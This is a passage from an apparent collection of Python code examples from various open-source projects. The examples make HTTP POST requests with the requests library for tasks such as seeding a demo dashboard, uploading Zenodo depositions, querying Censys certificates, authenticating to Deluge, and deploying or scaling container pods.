    f = open('{}'.format(os.path.join(demo_path, 'base.sql')), 'r')
    sql_str = f.read()
    print 'INSERT SQLITE DATA'
    cur.executescript(sql_str)
    conn.commit()
    f.close()
    if level > 0:
        l = open(os.path.join(demo_path, 'people.sql'), 'r').read()
        print 'INSERT SQLITE DATA LEVEL {}'.format(level)
        for i in xrange(level):
            cur.executescript(l)
            conn.commit()
            print "LEVEL {} COMMIT".format(i)
    cur.close()

    url_api = {
        'user': "http://127.0.0.1:8888/api/user",
        'connection': "http://127.0.0.1:8888/api/connection",
        'cube': "http://127.0.0.1:8888/api/cube",
        'element': "http://127.0.0.1:8888/api/element",
        'dashboard': "http://127.0.0.1:8888/api/dashboard"
    }
    data = {
        'user': {'username': 'admin', 'password': 'admin', 'rule': 'root'},
        'connection': {
            "connection": 'sqlite:///{}'.format(
                os.path.join(demo_path, 'demo.db')),
            "name": "DEMO"
        },
        'cube': [
            {
                "status": False,
                "run": False,
                "name": "Sales",
                "slug": "sales",
                "connection": "demo",
                "sql": "select * from SALE;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "People",
                "slug": "people",
                "connection": "demo",
                "sql": "select * from people;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "Product Sales",
                "slug": "product-sales",
                "connection": "demo",
                "sql": "select * from SALE_PRODUCT;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "Sales by month",
                "slug": "sales-by-month",
                "connection": "demo",
                "sql": "SELECT  strftime('%Y-%m', sale_at) as month, SUM(value) \
                        as total\nFROM    sale\n\
                        GROUP BY strftime('%Y-%m', sale_at)",
                "scheduler_status": False,
                "type": "relational"
            }
        ],
        'element': [
            {
                "alias": {

                },
                "cube": "people",
                "field_serie": None,
                "field_x": None,
                "field_y": None,
                "name": "People Grid",
                "orderby": [
                    "full_name"
                ],
                "orderby__order": [
                    "1"
                ],
                "scheduler_status": False,
                "show_fields": [
                    "id_people",
                    "full_name",
                    "gender",
                    "age",
                    "country",
                    "created_at"
                ],
                "type": "grid",
                "widgets": [
                    {
                        "field": "country",
                        "type": "distinct",
                        "label": "Country"
                    }
                ]
            },
            {
                "alias": {

                },
                "cube": "sales-by-month",
                "field_serie": None,
                "field_x": "month",
                "field_y": "total",
                "name": "Sales Bar",
                "scheduler_status": False,
                "show_fields": [
                    "month",
                    "total"
                ],
                "type": "chart_bar"
            },
            {
                "orderby": [
                    "sale_at"
                ],
                "cube": "sales",
                "name": "Sales Grid",
                "show_fields": [
                    "id_sale",
                    "id_people",
                    "value",
                    "paid",
                    "sale_at"
                ],
                "widgets": [],
                "alias": {

                },
                "field_x": None,
                "field_y": None,
                "scheduler_status": False,
                "orderby__order": [
                    "0"
                ],
                "type": "grid",
                "field_serie": None
            }
        ],
        'dashboard': {
            "scheduler_status": False,
            "element": [
                {
                    "id": "people-grid",
                    "label": "People Grid"
                },
                {
                    "id": "sales-bar",
                    "label": "Sales Bar"
                },
                {
                    "id": "sales-grid",
                    "label": "Sales Grid"
                }
            ],
            "slug": "demo",
            "name": "Demo"
        }
    }

    headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
    print 'CREATE USER admin'
    requests.post(url_api.get('user'), data=json.dumps(data.get('user')),
                  headers=headers)
    print 'CREATE connection'
    requests.post(url_api.get('connection'),
                  data=json.dumps(data.get('connection')),
                  headers=headers)
    print 'CREATE cube'
    for cb in data.get('cube'):
        requests.post(url_api.get('cube'), data=json.dumps(cb),
                      headers=headers)
        print 'RUNNING cube {}'.format(cb.get('slug'))
        process(cb)

    print 'CREATE element'
    for el in data.get('element'):
        print '--> {}'.format(el.get('name'))
        requests.post(url_api.get('element'), data=json.dumps(el),
                      headers=headers)

    print 'CREATE dashboard'
    requests.post(url_api.get('dashboard'),
                  data=json.dumps(data.get('dashboard')),
                  headers=headers)

Example 24

Project: zenodo Source File: upload.py
Function: upload
def upload(token, metadata, files, publish=True):
    """Make an upload."""
    base_url = 'http://localhost:5000/api/deposit/depositions'
    auth = {
        'Authorization': 'Bearer {0}'.format(token)
    }
    auth_json = {
        'Content-Type': 'application/json',
        'Accept': 'application/json',
    }
    auth_json.update(auth)

    r = requests.post(base_url, data='{}', headers=auth_json)
    assert r.status_code == 201
    links = r.json()['links']
    print('Create deposit:')
    print(r.json())
    # Wait for ES to index.
    sleep(1)

    for filename, stream in files:
        r = requests.post(
            links['files'],
            data=dict(filename=filename),
            files=dict(file=stream),
            headers=auth)
        assert r.status_code == 201
        print('Upload file:')
        print(r.json())

    r = requests.put(
        links['self'],
        data=json.dumps(dict(metadata=metadata)),
        headers=auth_json
    )
    assert r.status_code == 200
    print('Update metadata:')
    print(r.json())

    if publish:
        r = requests.post(links['publish'], headers=auth)
        assert r.status_code == 202
        print('Publish:')
        print(r.json())

    return r.json()['id']
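
Passing files= makes requests build a multipart/form-data body, and plain form fields can ride along in data=, which is how the file upload above attaches both the filename and the stream. A minimal sketch (URL, token, and file name are placeholders):

import requests

with open('dataset.csv', 'rb') as stream:
    r = requests.post('http://localhost:5000/api/deposit/files',
                      data={'filename': 'dataset.csv'},
                      files={'file': stream},
                      headers={'Authorization': 'Bearer TOKEN'})
r.raise_for_status()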

Example 25

Project: maltego_censys Source File: censys_subject_cn_to_sha1.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    cn = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.subject.common_name.raw: {cn}'.format(cn=cn), 'fields':
             ['443.https.tls.certificate.parsed.fingerprint_sha1', '443.https.tls.certificate.parsed.issuer_dn',
              '443.https.tls.certificate.parsed.subject_dn', 'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if 1 < pages < 5:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")

            else:
                mt.addUIMessage("No IP addresses found with this ssl cert subject cn: {cn}".format(cn=cn))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 26

Project: sd-agent Source File: test_transaction.py
    def testEndpoints(self):
        """
        Tests that the logic behind the agent version specific endpoints is ok.
        Also tests that these endpoints actually exist.
        """
        raise SkipTest("This test doesn't apply to Server Density.")
        MetricTransaction._endpoints = []
        api_key = "a" * 32
        config = {
            "sd_url": "https://agent.serverdensity.io",
            "api_key": api_key,
            "use_dd": True
        }

        app = Application()
        app.skip_ssl_validation = False
        app._agentConfig = config
        app.use_simple_http_client = True

        trManager = TransactionManager(timedelta(seconds=0), MAX_QUEUE_SIZE, THROTTLING_DELAY)
        trManager._flush_without_ioloop = True  # Use blocking API to emulate tornado ioloop
        MetricTransaction._trManager = trManager
        MetricTransaction.set_application(app)
        MetricTransaction.set_endpoints()

        transaction = MetricTransaction(None, {}, "")
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/intake/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Metric Transaction
        transaction = APIMetricTransaction(None, {})
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/series/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Service Check Transaction
        APIServiceCheckTransaction._trManager = trManager
        APIServiceCheckTransaction.set_application(app)
        APIServiceCheckTransaction.set_endpoints()

        transaction = APIServiceCheckTransaction(None, {})
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/check_run/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({'check': 'test', 'status': 0}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

Example 27

Project: edx-platform Source File: release.py
Function: create_github_creds
def create_github_creds():
    """
    https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization
    """
    headers = {"User-Agent": "edx-release"}
    payload = {
        "note": "edx-release",
        "scopes": ["repo"],
    }
    username = raw_input("GitHub username: ")
    password = getpass.getpass("GitHub password: ")
    response = requests.post(
        "https://api.github.com/authorizations",
        auth=(username, password),
        headers=headers, data=json.dumps(payload),
    )
    # is the user using two-factor authentication?
    otp_header = response.headers.get("X-GitHub-OTP")
    if not response.ok and otp_header and otp_header.startswith("required;"):
        # get two-factor code, redo the request
        headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ")
        response = requests.post(
            "https://api.github.com/authorizations",
            auth=(username, password),
            headers=headers, data=json.dumps(payload),
        )
    if not response.ok:
        message = response.json()["message"]
        if message != "Validation Failed":
            raise requests.exceptions.RequestException(message)
        else:
            # A token called "edx-release" already exists on GitHub.
            # Delete it, and try again.
            token_id = get_github_auth_id(username, password, "edx-release")
            if token_id:
                delete_github_auth_token(username, password, token_id)
            response = requests.post(
                "https://api.github.com/authorizations",
                auth=(username, password),
                headers=headers, data=json.dumps(payload),
            )
    if not response.ok:
        message = response.json()["message"]
        raise requests.exceptions.RequestException(message)

    return (username, response.json()["token"])

Example 28

Project: headphones Source File: deluge.py
def _get_auth():
    logger.debug('Deluge: Authenticating...')
    global delugeweb_auth, delugeweb_url, deluge_verify_cert
    delugeweb_auth = {}

    delugeweb_host = headphones.CONFIG.DELUGE_HOST
    delugeweb_cert = headphones.CONFIG.DELUGE_CERT
    delugeweb_password = headphones.CONFIG.DELUGE_PASSWORD
    logger.debug('Deluge: Using password %s******%s' % (delugeweb_password[0], delugeweb_password[-1]))

    if not delugeweb_host.startswith('http'):
        delugeweb_host = 'http://%s' % delugeweb_host

    if delugeweb_cert is None or delugeweb_cert.strip() == '':
        deluge_verify_cert = False
        logger.debug('Deluge: FYI no SSL certificate configured')
    else:
        deluge_verify_cert = delugeweb_cert
        delugeweb_host = delugeweb_host.replace('http:', 'https:')
        logger.debug('Deluge: Using certificate %s, host is now %s' % (_scrubber(deluge_verify_cert), _scrubber(delugeweb_host)))

    if delugeweb_host.endswith('/'):
        delugeweb_host = delugeweb_host[:-1]

    delugeweb_url = delugeweb_host + '/json'

    post_data = json.dumps({"method": "auth.login",
                            "params": [delugeweb_password],
                            "id": 1})
    try:
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
    except requests.ConnectionError:
        try:
            logger.debug('Deluge: Connection failed, let\'s try HTTPS just in case')
            response = requests.post(delugeweb_url.replace('http:', 'https:'), data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
            # If the previous line didn't fail, change delugeweb_url for the rest of this session
            logger.error('Deluge: Switching to HTTPS, but certificate won\'t be verified because NO CERTIFICATE WAS CONFIGURED!')
            delugeweb_url = delugeweb_url.replace('http:', 'https:')
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None
    except Exception as e:
        logger.error('Deluge: Authentication failed: %s' % str(e))
        formatted_lines = traceback.format_exc().splitlines()
        logger.error('; '.join(formatted_lines))
        return None

    auth = json.loads(response.text)["result"]
    auth_error = json.loads(response.text)["error"]
    logger.debug('Deluge: Authentication result: %s, Error: %s' % (auth, auth_error))
    delugeweb_auth = response.cookies
    logger.debug('Deluge: Authentication cookies: %s' % _scrubber(str(delugeweb_auth.get_dict())))
    post_data = json.dumps({"method": "web.connected",
                            "params": [],
                            "id": 10})
    try:
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
    except Exception as e:
        logger.error('Deluge: Authentication failed: %s' % str(e))
        formatted_lines = traceback.format_exc().splitlines()
        logger.error('; '.join(formatted_lines))
        return None

    connected = json.loads(response.text)['result']
    connected_error = json.loads(response.text)['error']
    logger.debug('Deluge: Connection result: %s, Error: %s' % (connected, connected_error))

    if not connected:
        post_data = json.dumps({"method": "web.get_hosts",
                                "params": [],
                                "id": 11})
        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        delugeweb_hosts = json.loads(response.text)['result']
        if len(delugeweb_hosts) == 0:
            logger.error('Deluge: WebUI does not contain daemons')
            return None

        post_data = json.dumps({"method": "web.connect",
                                "params": [delugeweb_hosts[0][0]],
                                "id": 11})

        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        post_data = json.dumps({"method": "web.connected",
                                "params": [],
                                "id": 10})

        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        connected = json.loads(response.text)['result']

        if not connected:
            logger.error('Deluge: WebUI could not connect to daemon')
            return None

    return auth
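
Every call above threads the delugeweb_auth cookie jar through by hand. A requests.Session carries cookies across calls automatically; a minimal sketch against a hypothetical local Deluge WebUI:

import json
import requests

session = requests.Session()
session.verify = False  # mirrors the unconfigured-certificate case above

# The auth.login response sets a session cookie that the Session reuses.
login = json.dumps({'method': 'auth.login', 'params': ['password'], 'id': 1})
session.post('http://localhost:8112/json', data=login)

check = json.dumps({'method': 'web.connected', 'params': [], 'id': 2})
response = session.post('http://localhost:8112/json', data=check)
print(response.json()['result'])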

Example 29

Project: headphones Source File: deluge.py
def setTorrentLabel(result):
    logger.debug('Deluge: Setting label')
    label = headphones.CONFIG.DELUGE_LABEL

    if not any(delugeweb_auth):
        _get_auth()

    if ' ' in label:
        logger.error('Deluge: Invalid label. Label can\'t contain spaces - replacing with underscores')
        label = label.replace(' ', '_')
    if label:
        # check if label already exists and create it if not
        post_data = json.dumps({"method": 'label.get_labels',
                                "params": [],
                                "id": 3})
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
        labels = json.loads(response.text)['result']

        if labels is not None:
            if label not in labels:
                try:
                    logger.debug('Deluge: %s label doesn\'t exist in Deluge, let\'s add it' % label)
                    post_data = json.dumps({"method": 'label.add',
                                            "params": [label],
                                            "id": 4})
                    response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                        verify=deluge_verify_cert)
                    logger.debug('Deluge: %s label added to Deluge' % label)
                except Exception as e:
                    logger.error('Deluge: Setting label failed: %s' % str(e))
                    formatted_lines = traceback.format_exc().splitlines()
                    logger.error('; '.join(formatted_lines))

            # add label to torrent
            post_data = json.dumps({"method": 'label.set_torrent',
                                    "params": [result['hash'], label],
                                    "id": 5})
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
            logger.debug('Deluge: %s label added to torrent' % label)
        else:
            logger.debug('Deluge: Label plugin not detected')
            return False

    return not json.loads(response.text)['error']

Example 30

Project: ochothon Source File: kill.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - kill all (or part of) the pods using a POST /control/kill
            # - wait for them to be dead
            # - warning, /control/kill will block (hence the 5 seconds timeout)
            #
            @retry(timeout=self.timeout, pause=0)
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'control/kill', subset=self.indices, timeout=self.timeout)
                    return [(code, seq) for seq, _, code in replies.values()]

                #
                # - fire the request at one or more pods
                # - wait for every pod to report back an HTTP 410 (GONE)
                # - this means the ochopod state-machine is now idling (e.g. dead)
                #
                js = run(self.proxy, _query)
                gone = sum(1 for code, _ in js if code == 410)
                assert gone == len(js), 'at least one pod is still running'
                return [seq for _, seq in js]

            down = _spin()
            self.out['down'] = down
            assert down, 'the cluster is either invalid or empty'
            logger.debug('%s : %d dead pods -> %s' % (self.cluster, len(down), ', '.join(['#%d' % seq for seq in down])))

            #
            # - now peek and see what pods we have
            # - we want to know what the underlying marathon application & task are
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info', subset=self.indices)
                return [(hints['application'], hints['task']) for _, hints, _ in replies.values()]

            js = run(self.proxy, _query)
            rollup = {key: [] for key in set([key for key, _ in js])}
            for app, task in js:
                rollup[app] += [task]

            #
            # - go through each application
            # - query it and check how many tasks it currently has
            # - the goal is to check if we should nuke the whole application or not
            #
            for app, tasks in rollup.items():

                url = 'http://%s/v2/apps/%s/tasks' % (master, app)
                reply = get(url, headers=headers)
                code = reply.status_code
                logger.debug('%s : -> %s (HTTP %d)' % (self.cluster, url, code))
                assert code == 200, 'task lookup failed (HTTP %d)' % code
                js = reply.json()

                if len(tasks) == len(js['tasks']):

                    #
                    # - all the containers running for that application were reported as dead
                    # - issue a DELETE /v2/apps to nuke the whole thing
                    #
                    url = 'http://%s/v2/apps/%s' % (master, app)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('%s : -> %s (HTTP %d)' % (self.cluster, url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

                else:

                    #
                    # - we killed a subset of that application's pods
                    # - cherry pick the underlying tasks and delete them at once using POST v2/tasks/delete
                    #
                    js = \
                        {
                            'ids': tasks
                        }

                    url = 'http://%s/v2/tasks/delete?scale=true' % master
                    reply = post(url, data=json.dumps(js), headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to kill -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to kill -> %s' % (self.cluster, diagnostic(failure)))

Example 31

Project: imagefactory Source File: e2eTest.py
def build_push_delete(target, index):
    global test_index
    build_queue.acquire()
    try:
        if(index < len(base_images)):
            base_image = base_images[index]
            if args.remote:
                payload = {'target_image': {'target': target}}
                print "Creating a target image"
                r = requests.post(args.url+'/base_images/'+base_image['id']+'/target_images', data=json.dumps(payload), headers=requests_headers, auth=oauth, verify=False)
                target_image_output_str = r.text
            else:
                (target_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw target_image --id %s %s' % (args.cmd, base_image['id'], target), shell=True)
            target_image_output_dict = json.loads(target_image_output_str)['target_image']
            target_image_id = target_image_output_dict['id']
            while(target_image_output_dict['status'] not in ('COMPLETE', 'COMPLETED', 'FAILED')):
                sleep(proc_chk_interval)
                if args.remote:
                    r = requests.get(args.url+'/target_images/'+target_image_id, auth=oauth, verify=False)
                    target_image_output_str = r.text
                else:
                    (target_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw images \'{"identifier":"%s"}\'' % (args.cmd, target_image_id), shell=True)
                target_image_output_dict = json.loads(target_image_output_str)['target_image']

            if(target_image_output_dict['status'] == 'FAILED'):
                with f_lock:
                    failures.append(target_image_output_dict)
            else:
                with t_lock:
                    target_images.append(target_image_output_dict)
                for provider in providers:
                    if((not provider['name'].startswith('example')) and (provider['target'] == target)):
                        try:
                            if 'ec2' in provider['target']:
                                f = open(provider['credentials'], 'r')
                                provider['credentials'] = f.read()
                                f.close()
                            credentials_file = NamedTemporaryFile()
                            credentials_file.write(provider['credentials'])
                            provider_file = NamedTemporaryFile()
                            provider_file.write(str(provider['definition']))
                            if args.remote:
                                payload = {'provider_image': {'target': target, 'provider': provider['name'], 'credentials': provider['credentials']}}
                                r = requests.post(args.url+'/target_images/'+target_image_id+'/provider_images', data=json.dumps(payload), headers=requests_headers, auth=oauth, verify=False)
                                provider_image_output_str = r.text
                            else:
                                (provider_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw provider_image --id %s %s %s %s' % (args.cmd, target_image_id, provider['target'], provider_file.name, credentials_file.name), shell=True)
                            provider_image_output_dict = json.loads(provider_image_output_str)['provider_image']
                            provider_image_id = provider_image_output_dict['id']
                            while(provider_image_output_dict['status'] not in ('COMPLETE', 'COMPLETED', 'FAILED')):
                                sleep(proc_chk_interval)
                                if args.remote:
                                    r = requests.get(args.url+'/provider_images/'+provider_image_id, auth=oauth, verify=False)
                                    provider_image_output_str = r.text
                                else:
                                    (provider_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw images \'{"identifier":"%s"}\'' % (args.cmd, provider_image_id), shell=True)
                                provider_image_output_dict = json.loads(provider_image_output_str)['provider_image']

                            if(provider_image_output_dict['status'] == 'FAILED'):
                                with f_lock:
                                    failures.append(provider_image_output_dict)
                            else:
                                with p_lock:
                                    provider_images.append(provider_image_output_dict)
                                if args.remote:
                                    print "Deleting provider image %s" % (provider_image_id,)
                                    r = requests.delete(args.url+'/provider_images/'+provider_image_id, auth=oauth, verify=False)
                                else:
                                    subprocess_check_output('%s --output json --raw delete %s --target %s --provider %s --credentials %s' % (args.cmd, provider_image_id, provider['target'], provider_file.name, credentials_file.name), shell=True)
                        finally:
                            credentials_file.close()
                            provider_file.close()

    finally:
        build_queue.release()
        test_index += 1
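
The same poll-until-terminal-state loop appears twice above, once per image type. Factored out, the pattern is small (the URL, auth, and response shape are assumptions drawn from the example; verify=False mirrors it):

import time
import requests

def wait_for_image(url, auth, key, interval=10,
                   terminal=('COMPLETE', 'COMPLETED', 'FAILED')):
    # Re-fetch the image resource until its status settles.
    while True:
        body = requests.get(url, auth=auth, verify=False).json()
        if body[key]['status'] in terminal:
            return body[key]
        time.sleep(interval)

# e.g. wait_for_image(args.url + '/target_images/' + image_id, oauth, 'target_image')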

Example 32

Project: ochonetes Source File: deploy.py
    def run(self):
        try:

            #
            # - workaround to fetch the master IP and credentials as there does not seem to
            #   be a way to use 10.0.0.2 from within the pod
            #
            assert 'KUBERNETES_MASTER' in os.environ,   '$KUBERNETES_MASTER not specified (check your portal pod)'
            assert 'KUBERNETES_USER' in os.environ,     '$KUBERNETES_USER not specified (check your portal pod)'
            assert 'KUBERNETES_PWD' in os.environ,      '$KUBERNETES_PWD not specified (check your portal pod)'

            auth = HTTPBasicAuth(os.environ['KUBERNETES_USER'], os.environ['KUBERNETES_PWD'])

            with open(self.template, 'r') as f:

                #
                # - parse the yaml file
                # - add the ochopod control port if not specified
                #
                cfg = yaml.load(f)
                if 8080 not in cfg['ports']:
                    cfg['ports'].append(8080)

                #
                # - derive a unique application name from the cluster name and a timestamp
                #
                suffix = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = 'ochopod.%s.%s-%s' % (self.namespace, cfg['cluster'], suffix)

                env = \
                    {
                        'KUBERNETES_MASTER': os.environ['KUBERNETES_MASTER'],
                        'KUBERNETES_USER': os.environ['KUBERNETES_USER'],
                        'KUBERNETES_PWD': os.environ['KUBERNETES_PWD'],
                        'ochopod_cluster': cfg['cluster'],
                        'ochopod_namespace': self.namespace,
                        'ochopod_application': qualified,
                        'pod': json.dumps(cfg['settings']) if 'settings' in cfg else '{}'
                    }

                labels = \
                    {
                        'name': qualified
                    }

                container = \
                    {
                        'name': cfg['cluster'],
                        'image': cfg['image'],
                        'env': [{'name': key, 'value': value} for key, value in env.items()],
                        'ports': [{'containerPort': port} for port in cfg['ports']]
                    }

                controller = \
                    {
                        'kind': 'ReplicationController',
                        'apiVersion': 'v1beta3',
                        'metadata': {'name': qualified},
                        'spec':
                            {
                                'replicas': self.pods,
                                'selector': {'name': qualified},
                                'template':
                                    {
                                        'metadata': {'labels': labels},
                                        'spec':
                                            {
                                                'containers': [container]
                                            }
                                    }
                            }

                    }

                #
                # - prep the REST headers & POST the new replication controller to the master
                #
                headers = \
                    {
                        'content-type': 'application/json',
                        'accept': 'application/json'
                    }

                url = 'https://%s/api/v1beta3/namespaces/default/replicationcontrollers' % os.environ['KUBERNETES_MASTER']
                reply = requests.post(url, auth=auth, data=json.dumps(controller), headers=headers, verify=False)
                code = reply.status_code
                logger.debug('-> POST %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

            self.deployed = self.pods
            self.ok = 1

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))
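
The interesting part above is the submission itself: serialize the replication controller manifest to JSON and POST it to the Kubernetes API with basic auth. A minimal sketch of that call, with a hypothetical master, credentials and manifest standing in for the real ones:

import json
import requests
from requests.auth import HTTPBasicAuth

# Hypothetical endpoint and credentials; substitute your own master and user.
url = 'https://k8s-master.example.com/api/v1beta3/namespaces/default/replicationcontrollers'
auth = HTTPBasicAuth('admin', 'secret')
headers = {'content-type': 'application/json', 'accept': 'application/json'}

manifest = {'kind': 'ReplicationController', 'apiVersion': 'v1beta3', 'metadata': {'name': 'demo'}}

# POST the JSON-encoded manifest; verify=False mirrors the example above
# (self-signed cluster certificate), though enabling verification is safer.
reply = requests.post(url, auth=auth, data=json.dumps(manifest), headers=headers, verify=False)
assert reply.status_code in (200, 201), 'submission failed (HTTP %d)' % reply.status_code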

Example 33

Project: ochothon Source File: scale.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [(seq, hints['application'], hints['task']) for (seq, hints, _) in replies.values()]

            #
            # - remap a bit differently and get an ordered list of task identifiers
            # - we'll use that to kill the newest pods
            #
            js = run(self.proxy, _query)
            total = len(js)
            if self.group is not None:

                #
                # - if -g was specified apply the scaling to the underlying marathon application containing that pod
                # - be careful to update the task list and total # of pods
                #
                keys = {seq: key for (seq, key, _) in js}
                assert self.group in keys, '#%d is not a valid pod index' % self.group
                app = keys[self.group]
                tasks = [(seq, task) for (seq, key, task) in sorted(js, key=(lambda _: _[0])) if key == app]
                total = sum(1 for (_, key, _) in js if key == app)

            else:

                #
                # - check and make sure all our pods map to one single marathon application
                #
                keys = set([key for (_, key, _) in js])
                assert len(keys) == 1, '%s maps to more than one application, you must specify -g' % self.cluster
                tasks = [(seq, task) for (seq, _, task) in sorted(js, key=(lambda _: _[0]))]
                app = keys.pop()

            #
            # - infer the target # of pods based on the user-defined factor
            #
            operator = self.factor[0]
            assert operator in ['@', 'x'], 'invalid operator'
            n = float(self.factor[1:])
            target = n if operator == '@' else total * n

            #
            # - make sure the target # of pods is at least 1
            #
            target = max(1, int(target))
            self.out['delta'] = target - total
            if target > total:

                #
